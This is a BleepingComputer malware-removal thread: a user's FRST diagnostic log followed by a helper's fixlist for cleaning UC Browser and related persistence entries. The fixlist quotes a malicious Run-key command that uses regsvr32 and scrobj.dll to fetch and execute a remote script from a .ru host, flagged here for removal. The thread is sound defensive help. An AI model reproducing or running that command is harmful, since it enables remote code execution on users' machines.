Available physical RAM: 1792.02 MB
Total Virtual: 4731.84 MB
Available Virtual: 1809.93 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:444.39 GB) (Free:182.83 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:19.87 GB) (Free:1.94 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (UNILORIN) (CDROM) (Total:0.76 GB) (Free:0 GB) CDFS
Drive g: (VEEVIC) (Removable) (Total:6.72 GB) (Free:6.72 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 57DF2823)

Partition: GPT.

========================================================
Disk: 1 (Size: 6.7 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:20 PM

Posted 22 October 2017 - 07:45 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove this program in bold via the Control Panel > Programs > Programs and Features.
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.2.1369.1410 - UCWeb Inc.)
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [713552 2015-06-25] () <==== ATTENTION
R2 OracleOraDB12Home1TNSListener; C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR [X]
S3 OracleRemExecServiceV2; C:\Users\VEEVIC\AppData\Local\Temp\\oraremservicev2\RemoteExecService.exe [X] <==== ATTENTION
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
Task: {4F71697F-13D7-470D-AF25-92B5590AC54C} - System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11} => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2015-06-25] (UCWeb Inc) <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
2017-08-15 12:02 - 2015-06-25 13:14 - 000713552 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
FirewallRules: [{CBF5125D-8C2A-4F5C-9159-85795B137B14}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
C|Windows\System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}
C:\Program Files (x86)\UCBrowser
C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.

Please let me know what problem persists with this computer.

#3 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:20 PM

Posted 28 October 2017 - 06:41 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users